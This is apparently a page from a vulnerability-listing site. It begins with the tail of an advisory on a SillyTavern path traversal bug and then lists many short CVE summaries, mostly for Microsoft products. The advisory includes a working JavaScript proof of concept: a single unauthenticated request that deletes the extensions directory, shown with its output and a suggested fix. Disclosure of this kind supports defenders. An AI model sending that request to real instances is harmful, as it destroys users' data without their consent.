'third-party/Extension-Notebook' }] // Attack const res = await fetch('/api/extensions/delete', { method: 'POST', headers, body: JSON.stringify({ extensionName: '.' }), }); console.log('Status:', res.status); // 200 console.log('Body:', await res.text()); // "Extension has been deleted at data\default-user\extensions" // After: empty const after = await (await fetch('/api/extensions/discover', { headers })).json(); console.log('After:', after.filter(e => e.type === 'local')); // [] } poc(); ``` **Result:** Before: [{ type: 'local', name: 'third-party/Extension-Notebook' }] Status: 200 Body: Extension has been deleted at data\default-user\extensions After: [] ## Impact - **No authentication required** (`basicAuthMode: false` by default). Any user with network access to the SillyTavern instance can permanently delete the entire extensions directory with a single HTTP request. - All installed third-party extensions are unrecoverably lost. - With `global: true` and admin privileges, the global extensions directory shared across all users can also be deleted. - This vulnerability can be chained with CVE-2025-59159 (DNS rebinding) to enable unauthenticated remote exploitation from a malicious website. ## Same Pattern in Other Endpoints The same vulnerability exists in: - `POST /api/extensions/update` - `POST /api/extensions/version` - `POST /api/extensions/branches` - `POST /api/extensions/switch` ## Suggested Fix ```javascript const sanitized = sanitize(extensionName); // Check AFTER sanitizing if (!sanitized) { return response.status(400).send('Bad Request: Invalid extension name.'); } const extensionPath = path.join(basePath, sanitized); // Additional path traversal guard const resolvedPath = path.resolve(extensionPath); const resolvedBase = path.resolve(basePath); if (!resolvedPath.startsWith(resolvedBase + path.sep)) { return response.status(400).send('Bad Request: Invalid extension path.'); } ``` Apply the same fix to `/update`, `/version`, `/branches`, and `/switch` endpoints. ## References - CWE-22: Improper Limitation of a Pathname to a Restricted Directory - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H (9.1 Critical) - sanitize-filename npm: https://www.npmjs.com/package/sanitize-filename - Related CVE (same project): CVE-2025-59159 ##REPORTED BY Jormungandr

Microsoft Node.js CSRF +1
NVD GitHub
EPSS 0% CVSS 8.5
HIGH This Week

Improper input validation for some Intel(R) QAT software drivers for Windows before version 1.13 within Ring 3: User Applications may allow an escalation of privilege. Unprivileged software adversary with an authenticated user combined with a low complexity attack may enable escalation of privilege. This result may potentially occur via local access when attack requirements are not present without special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (high), integrity (high) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (none) impacts.

Privilege Escalation Microsoft Intel
NVD VulDB
EPSS 0% CVSS 8.5
HIGH This Week

Out-of-bounds write for some Intel(R) QAT software drivers for Windows before version 1.13 within Ring 3: User Applications may allow a escalation of privilege. Unprivileged software adversary with an authenticated user combined with a low complexity attack may enable escalation of privilege. This result may potentially occur via local access when attack requirements are not present without special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (high), integrity (high) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (none) impacts.

Microsoft Buffer Overflow Memory Corruption +2
NVD VulDB
EPSS 0% CVSS 7.7
HIGH PATCH This Week

Xibo is an open source digital signage platform with a web content management system and Windows display player software. Prior to 4.4.1, an authenticated Server-Side Request Forgery (SSRF) vulnerability in the Xibo CMS allows users with Library upload permissions to make arbitrary HTTP requests from the CMS server to internal or external network resources. This can be exploited to scan internal infrastructure, access local cloud metadata endpoints (e.g., AWS IMDS), interact with internal services that lack authentication, or exfiltrate data. This vulnerability is fixed in 4.4.1.

SSRF Microsoft
NVD GitHub
EPSS 0% CVSS 5.3
MEDIUM PATCH This Month

linux-entra-sso is a browser plugin for Linux to SSO on Microsoft Entra ID. Prior to 1.8.1, platform/chrome/js/platform-chrome.js:69-88 registers a single declarativeNetRequest rule whose urlFilter is Platform.SSO_URL + "/*", i.e. "https://login.microsoftonline.com/*". Chrome's urlFilter without a | or || anchor is substring-matched against the full request URL. The same applied rule action is modifyHeaders that attaches the Entra ID Primary Refresh Token cookie. The Firefox adapter in platform/firefox/js/platform-firefox.js:53 performs a belt-and-braces startsWith(Platform.SSO_URL) check before injecting the header; the Chrome adapter does not. When the extension holds broad host permissions through the optional_host_permissions: ["https://*/*"] declared in platform/chrome/manifest.json:34, a main-frame navigation to a URL whose path embeds https://login.microsoftonline.com/ causes Chrome to attach the PRT cookie to the request to the attacker-controlled host. This vulnerability is fixed in 1.8.1.

Authentication Bypass Mozilla Microsoft +2
NVD GitHub
EPSS 0% CVSS 7.7
HIGH PATCH This Week

Improper privilege management in Microsoft Dynamics 365 Customer Insights allows an authorized attacker to elevate privileges over a network.

Privilege Escalation Microsoft
NVD VulDB
EPSS 0% CVSS 5.4
MEDIUM PATCH Exploit Unlikely This Month

Improper neutralization of special elements in output used by a downstream component ('injection') in Microsoft Edge (Chromium-based) allows an unauthorized attacker to elevate privileges over a network.

Authentication Bypass Microsoft Google
NVD VulDB
EPSS 0% CVSS 4.3
MEDIUM PATCH This Month

User interface (ui) misrepresentation of critical information in Microsoft Edge (Chromium-based) allows an unauthorized attacker to perform spoofing over a network.

Authentication Bypass Microsoft Google
NVD VulDB
EPSS 0% CVSS 9.1
CRITICAL PATCH Exploit Unlikely Act Now

Execution with unnecessary privileges in Microsoft Dynamics 365 (on-premises) allows an authorized attacker to execute code over a network.

Privilege Escalation Microsoft
NVD VulDB
EPSS 0% CVSS 7.7
HIGH PATCH This Week

Improper access control in Microsoft Office allows an unauthorized attacker to perform spoofing locally.

Authentication Bypass Microsoft
NVD VulDB
EPSS 0% CVSS 6.5
MEDIUM PATCH Exploit Unlikely This Month

Untrusted search path in Azure Monitor Agent allows an authorized attacker to elevate privileges locally.

Microsoft Information Disclosure
NVD VulDB
EPSS 0% CVSS 9.9
CRITICAL PATCH Exploit Unlikely Act Now

Improper access control in Azure Logic Apps allows an authorized attacker to elevate privileges over a network.

Authentication Bypass Microsoft
NVD VulDB
EPSS 0% CVSS 9.1
CRITICAL PATCH Exploit Likely Act Now

Incorrect implementation of authentication algorithm in Microsoft SSO Plugin for Jira &amp; Confluence allows an unauthorized attacker to elevate privileges over a network.

Authentication Bypass Microsoft Atlassian
NVD VulDB
EPSS 0% CVSS 7.8
HIGH PATCH Exploit Unlikely This Week

Improper access control in Azure Connected Machine Agent allows an authorized attacker to elevate privileges locally.

Authentication Bypass Microsoft
NVD VulDB
EPSS 0% CVSS 6.7
MEDIUM PATCH Exploit Unlikely This Month

Reliance on a component that is not updateable in Windows Secure Boot allows an authorized attacker to bypass a security feature locally.

Authentication Bypass Microsoft
NVD VulDB
EPSS 0% CVSS 8.8
HIGH PATCH Exploit Unlikely This Week

Improper access control in Windows Admin Center allows an authorized attacker to elevate privileges over a network.

Authentication Bypass Microsoft
NVD VulDB
EPSS 0% CVSS 8.8
HIGH PATCH Exploit Unlikely This Week

Improper access control in Microsoft Office Click-To-Run allows an authorized attacker to elevate privileges locally.

Authentication Bypass Microsoft
NVD VulDB
EPSS 0% CVSS 8.8
HIGH PATCH Exploit Unlikely This Week

Insufficient granularity of access control in Microsoft Office Click-To-Run allows an authorized attacker to elevate privileges locally.

Microsoft Information Disclosure
NVD VulDB
EPSS 0% CVSS 7.8
HIGH PATCH This Week

Use after free in Microsoft Office Click-To-Run allows an authorized attacker to elevate privileges locally.

Denial Of Service Microsoft Use After Free +1
NVD VulDB
EPSS 0% CVSS 7.4
HIGH PATCH Exploit Unlikely This Week

Null pointer dereference in Windows TCP/IP allows an unauthorized attacker to deny service over an adjacent network.

Denial Of Service Microsoft Null Pointer Dereference
NVD VulDB
EPSS 0% CVSS 8.8
HIGH PATCH Exploit Unlikely This Week

Heap-based buffer overflow in Windows Win32K - GRFX allows an authorized attacker to execute code locally.

Heap Overflow Microsoft Buffer Overflow
NVD VulDB
EPSS 0% CVSS 9.3
CRITICAL PATCH Exploit Unlikely Act Now

Use after free in Windows Hyper-V allows an unauthorized attacker to elevate privileges locally.

Denial Of Service Microsoft Use After Free +1
NVD VulDB
EPSS 0% CVSS 7.1
HIGH PATCH This Week

Null pointer dereference in Windows TCP/IP allows an unauthorized attacker to deny service locally.

Denial Of Service Microsoft Null Pointer Dereference
NVD VulDB
EPSS 0% CVSS 7.8
HIGH PATCH Exploit Likely This Week

Heap-based buffer overflow in Windows Remote Desktop allows an authorized attacker to elevate privileges locally.

Heap Overflow Microsoft Buffer Overflow
NVD VulDB
EPSS 0% CVSS 4.4
MEDIUM PATCH This Month

Improper access control in Windows Filtering Platform (WFP) allows an authorized attacker to bypass a security feature locally.

Authentication Bypass Microsoft
NVD VulDB
EPSS 0% CVSS 7.8
HIGH PATCH Exploit Likely This Week

Integer underflow (wrap or wraparound) in Windows Common Log File System Driver allows an authorized attacker to elevate privileges locally.

Integer Overflow Microsoft Information Disclosure
NVD VulDB
EPSS 0% CVSS 7.8
HIGH PATCH Exploit Unlikely This Week

Use after free in Windows Telephony Service allows an authorized attacker to elevate privileges locally.

Denial Of Service Microsoft Use After Free +1
NVD VulDB
EPSS 0% CVSS 7.8
HIGH PATCH Exploit Likely This Week

Untrusted pointer dereference in Windows Kernel allows an authorized attacker to elevate privileges locally.

Microsoft Information Disclosure Windows 11 Version 24H2 +4
NVD VulDB
EPSS 0% CVSS 8.4
HIGH PATCH This Week

Untrusted pointer dereference in Microsoft Office Word allows an unauthorized attacker to execute code locally.

Authentication Bypass Microsoft
NVD VulDB
EPSS 0% CVSS 8.8
HIGH PATCH Exploit Unlikely This Week

Insufficient granularity of access control in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.

Microsoft Information Disclosure
NVD VulDB
EPSS 0% CVSS 7.8
HIGH PATCH Exploit Unlikely This Week

Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.

Heap Overflow Microsoft Buffer Overflow
NVD VulDB
EPSS 0% CVSS 8.4
HIGH PATCH Exploit Likely This Week

Use after free in Microsoft Office Word allows an unauthorized attacker to execute code locally.

Denial Of Service Microsoft Use After Free +1
NVD VulDB
EPSS 0% CVSS 7.8
HIGH PATCH Exploit Unlikely This Week

Use after free in Microsoft Office Excel allows an unauthorized attacker to execute code locally.

Denial Of Service Microsoft Use After Free +1
NVD VulDB
EPSS 0% CVSS 8.4
HIGH PATCH Exploit Unlikely This Week

Use after free in Microsoft Office allows an unauthorized attacker to execute code locally.

Denial Of Service Microsoft Use After Free +1
NVD VulDB
EPSS 1% CVSS 8.8
HIGH PATCH Exploit Unlikely This Week

Deserialization of untrusted data in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.

Microsoft Deserialization
NVD VulDB
EPSS 0% CVSS 7.0
HIGH PATCH Exploit Unlikely This Week

Double free in Windows Link-Layer Discovery Protocol (LLDP) allows an authorized attacker to elevate privileges locally.

Microsoft Information Disclosure
NVD VulDB
EPSS 0% CVSS 7.0
HIGH PATCH Exploit Unlikely This Week

Use after free in Windows Projected File System allows an authorized attacker to elevate privileges locally.

Denial Of Service Microsoft Use After Free +1
NVD VulDB
EPSS 0% CVSS 5.5
MEDIUM PATCH Exploit Unlikely This Month

Null pointer dereference in Windows LDAP - Lightweight Directory Access Protocol allows an authorized attacker to deny service locally.

Denial Of Service Microsoft Null Pointer Dereference
NVD VulDB
EPSS 0% CVSS 7.8
HIGH PATCH Exploit Unlikely This Week

Use after free in Windows Telephony Service allows an authorized attacker to elevate privileges locally.

Denial Of Service Microsoft Use After Free +1
NVD VulDB
EPSS 0% CVSS 7.8
HIGH PATCH Exploit Unlikely This Week

Use after free in Windows Cloud Files Mini Filter Driver allows an authorized attacker to elevate privileges locally.

Denial Of Service Microsoft Use After Free +1
NVD VulDB
EPSS 0% CVSS 7.8
HIGH PATCH This Week

Buffer over-read in Windows DWM Core Library allows an authorized attacker to disclose information locally.

Microsoft Buffer Overflow
NVD VulDB
EPSS 0% CVSS 7.8
HIGH PATCH This Week

Concurrent execution using shared resource with improper synchronization ('race condition') in Windows TCP/IP allows an authorized attacker to elevate privileges locally.

Microsoft Race Condition Information Disclosure
NVD VulDB
EPSS 0% CVSS 8.0
HIGH PATCH This Week

Use after free in Windows Kernel-Mode Drivers allows an authorized attacker to execute code over a network.

Denial Of Service Microsoft Use After Free +1
NVD VulDB
EPSS 0% CVSS 7.8
HIGH PATCH Exploit Unlikely This Week

Double free in Windows Message Queuing allows an authorized attacker to elevate privileges locally.

Microsoft Information Disclosure
NVD VulDB
EPSS 0% CVSS 7.8
HIGH PATCH Exploit Likely This Week

Heap-based buffer overflow in Windows TCP/IP allows an authorized attacker to elevate privileges locally.

Heap Overflow Microsoft Buffer Overflow
NVD VulDB
EPSS 0% CVSS 7.8
HIGH PATCH Exploit Likely This Week

Use after free in Windows Cloud Files Mini Filter Driver allows an authorized attacker to elevate privileges locally.

Denial Of Service Microsoft Use After Free +1
NVD VulDB
EPSS 0% CVSS 8.2
HIGH PATCH Exploit Unlikely This Week

Improper neutralization of special elements in output used by a downstream component ('injection') in Azure Machine Learning allows an unauthorized attacker to perform spoofing over a network.

Authentication Bypass Microsoft Azure Machine Learning
NVD VulDB
EPSS 1% CVSS 8.8
HIGH PATCH Exploit Unlikely This Week

Deserialization of untrusted data in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.

Microsoft Deserialization
NVD VulDB
EPSS 1% CVSS 8.8
HIGH PATCH Exploit Unlikely This Week

Deserialization of untrusted data in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.

Microsoft Deserialization
NVD VulDB
EPSS 0% CVSS 9.9
CRITICAL PATCH Act Now

Improper control of generation of code ('code injection') in Microsoft Dynamics 365 (on-premises) allows an authorized attacker to execute code over a network.

Microsoft Code Injection RCE
NVD VulDB
EPSS 0% CVSS 7.8
HIGH PATCH Exploit Unlikely This Week

Integer overflow or wraparound in Windows DWM Core Library allows an authorized attacker to elevate privileges locally.

Integer Overflow Microsoft Buffer Overflow
NVD VulDB
EPSS 0% CVSS 4.3
MEDIUM PATCH This Month

User interface (ui) misrepresentation of critical information in Microsoft Edge for Android allows an unauthorized attacker to perform spoofing over a network.

Authentication Bypass Microsoft Google
NVD VulDB
EPSS 0% CVSS 6.5
MEDIUM PATCH This Month

User interface (ui) misrepresentation of critical information in Microsoft Edge (Chromium-based) allows an unauthorized attacker to perform spoofing over a network.

Authentication Bypass Microsoft Google
NVD VulDB
EPSS 0% CVSS 7.0
HIGH PATCH This Week

Use after free in Windows Telephony Service allows an authorized attacker to elevate privileges locally.

Denial Of Service Microsoft Use After Free +1
NVD VulDB
EPSS 0% CVSS 7.4
HIGH PATCH Exploit Unlikely This Week

External control of file name or path in Microsoft Edge (Chromium-based) allows an unauthorized attacker to disclose information over a network.

Microsoft Information Disclosure Google
NVD VulDB
EPSS 0% CVSS 7.8
HIGH PATCH This Week

Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code locally.

Heap Overflow Microsoft Buffer Overflow
NVD VulDB
EPSS 0% CVSS 5.5
MEDIUM PATCH Exploit Unlikely This Month

Files or directories accessible to external parties in Microsoft Teams allows an unauthorized attacker to perform spoofing locally.

Microsoft Information Disclosure Path Traversal
NVD VulDB
EPSS 0% CVSS 6.7
MEDIUM PATCH Exploit Unlikely This Month

Double free in Windows Rich Text Edit Control allows an authorized attacker to elevate privileges locally.

Microsoft Information Disclosure
NVD VulDB
EPSS 0% CVSS 7.5
HIGH PATCH Exploit Unlikely This Week

Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Native WiFi Miniport Driver allows an unauthorized attacker to execute code over an adjacent network.

Authentication Bypass Microsoft Race Condition
NVD VulDB
EPSS 0% CVSS 7.1
HIGH PATCH This Week

Improper access control in Microsoft Office PowerPoint allows an authorized attacker to perform spoofing locally.

Authentication Bypass Microsoft
NVD VulDB
EPSS 0% CVSS 7.1
HIGH PATCH This Week

Improper access control in Microsoft Office Word allows an authorized attacker to perform spoofing locally.

Authentication Bypass Microsoft
NVD VulDB
EPSS 0% CVSS 9.8
CRITICAL PATCH Act Now

Heap-based buffer overflow in Microsoft Windows DNS allows an unauthorized attacker to execute code over a network.

Heap Overflow Microsoft Buffer Overflow
NVD VulDB
EPSS 0% CVSS 8.8
HIGH PATCH Exploit Unlikely This Week

Improper control of generation of code ('code injection') in Microsoft Data Formulator allows an unauthorized attacker to execute code over a network.

Microsoft Code Injection RCE
NVD VulDB
EPSS 0% CVSS 9.8
CRITICAL POC PATCH Exploit Unlikely Act Now

Stack-based buffer overflow in Windows Netlogon allows an unauthorized attacker to execute code over a network.

Stack Overflow Microsoft Buffer Overflow
NVD VulDB GitHub
EPSS 0% CVSS 7.8
HIGH PATCH This Week

External control of file name or path in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally.

Microsoft Information Disclosure
NVD VulDB
EPSS 0% CVSS 4.3
MEDIUM PATCH Exploit Unlikely This Month

External control of file name or path in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.

Microsoft Information Disclosure
NVD VulDB
EPSS 0% CVSS 7.8
HIGH PATCH Exploit Unlikely This Week

Use after free in Microsoft Office allows an authorized attacker to elevate privileges locally.

Denial Of Service Microsoft Use After Free +1
NVD VulDB
EPSS 0% CVSS 8.1
HIGH PATCH This Week

Use after free in Windows TCP/IP allows an unauthorized attacker to execute code over a network.

Denial Of Service Microsoft Use After Free +1
NVD VulDB
EPSS 0% CVSS 7.4
HIGH PATCH This Week

Null pointer dereference in Windows TCP/IP allows an unauthorized attacker to deny service over an adjacent network.

Denial Of Service Microsoft Null Pointer Dereference
NVD VulDB
EPSS 0% CVSS 7.0
HIGH PATCH Exploit Unlikely This Week

Use after free in Windows SMB Client allows an authorized attacker to elevate privileges locally.

Denial Of Service Microsoft Use After Free +1
NVD VulDB
EPSS 0% CVSS 7.8
HIGH PATCH Exploit Unlikely This Week

Use after free in Windows Kernel-Mode Drivers allows an authorized attacker to elevate privileges locally.

Denial Of Service Microsoft Use After Free +1
NVD VulDB
EPSS 0% CVSS 7.8
HIGH PATCH This Week

Heap-based buffer overflow in Windows Common Log File System Driver allows an authorized attacker to elevate privileges locally.

Heap Overflow Microsoft Buffer Overflow
NVD VulDB
EPSS 0% CVSS 7.5
HIGH PATCH Exploit Unlikely This Week

Use after free in Windows TCP/IP allows an unauthorized attacker to disclose information over a network.

Denial Of Service Microsoft Use After Free +1
NVD VulDB
EPSS 0% CVSS 7.5
HIGH PATCH Exploit Unlikely This Week

Null pointer dereference in Windows TCP/IP allows an unauthorized attacker to deny service over a network.

Denial Of Service Microsoft Null Pointer Dereference
NVD VulDB
EPSS 0% CVSS 7.8
HIGH PATCH Exploit Unlikely This Week

Stack-based buffer overflow in Windows TCP/IP allows an authorized attacker to elevate privileges locally.

Stack Overflow Microsoft Buffer Overflow
NVD VulDB
EPSS 0% CVSS 7.8
HIGH PATCH Exploit Unlikely This Week

Heap-based buffer overflow in Windows Cryptographic Services allows an authorized attacker to elevate privileges locally.

Heap Overflow Microsoft Buffer Overflow
NVD VulDB
EPSS 0% CVSS 8.0
HIGH PATCH Exploit Unlikely This Week

Deserialization of untrusted data in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.

Microsoft Deserialization
NVD VulDB
EPSS 0% CVSS 8.4
HIGH PATCH Exploit Unlikely This Week

Use after free in Microsoft Office Word allows an unauthorized attacker to execute code locally.

Denial Of Service Microsoft Use After Free +1
NVD VulDB
EPSS 0% CVSS 8.4
HIGH PATCH Exploit Likely This Week

Access of resource using incompatible type ('type confusion') in Microsoft Office Word allows an unauthorized attacker to execute code locally.

Authentication Bypass Microsoft Memory Corruption
NVD VulDB
EPSS 0% CVSS 8.4
HIGH PATCH Exploit Unlikely This Week

Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code locally.

Heap Overflow Microsoft Buffer Overflow
NVD VulDB
EPSS 0% CVSS 7.8
HIGH PATCH This Week

Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.

Microsoft Information Disclosure Buffer Overflow
NVD VulDB
EPSS 0% CVSS 5.5
MEDIUM PATCH Exploit Unlikely This Month

Files or directories accessible to external parties in Microsoft Office Word allows an unauthorized attacker to disclose information locally.

Microsoft Information Disclosure Path Traversal
NVD VulDB
EPSS 1% CVSS 8.8
HIGH PATCH Exploit Unlikely This Week

Deserialization of untrusted data in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.

Microsoft Deserialization
NVD VulDB
EPSS 0% CVSS 8.3
HIGH PATCH Exploit Unlikely This Week

Missing authorization in Windows Admin Center allows an authorized attacker to elevate privileges over a network.

Authentication Bypass Microsoft
NVD VulDB
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Missing release of memory after effective lifetime in Windows Internet Key Exchange (IKE) Protocol allows an unauthorized attacker to deny service over a network.

Authentication Bypass Microsoft
NVD VulDB
EPSS 0% CVSS 6.5
MEDIUM PATCH This Month

Authentication bypass using an alternate path or channel in Windows TCP/IP allows an authorized attacker to bypass a security feature over a network.

Authentication Bypass Microsoft
NVD VulDB
EPSS 0% CVSS 7.8
HIGH PATCH This Week

Heap-based buffer overflow in Windows GDI allows an unauthorized attacker to execute code locally.

Heap Overflow Microsoft Buffer Overflow
NVD VulDB
Prev Page 15 of 193 Next

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy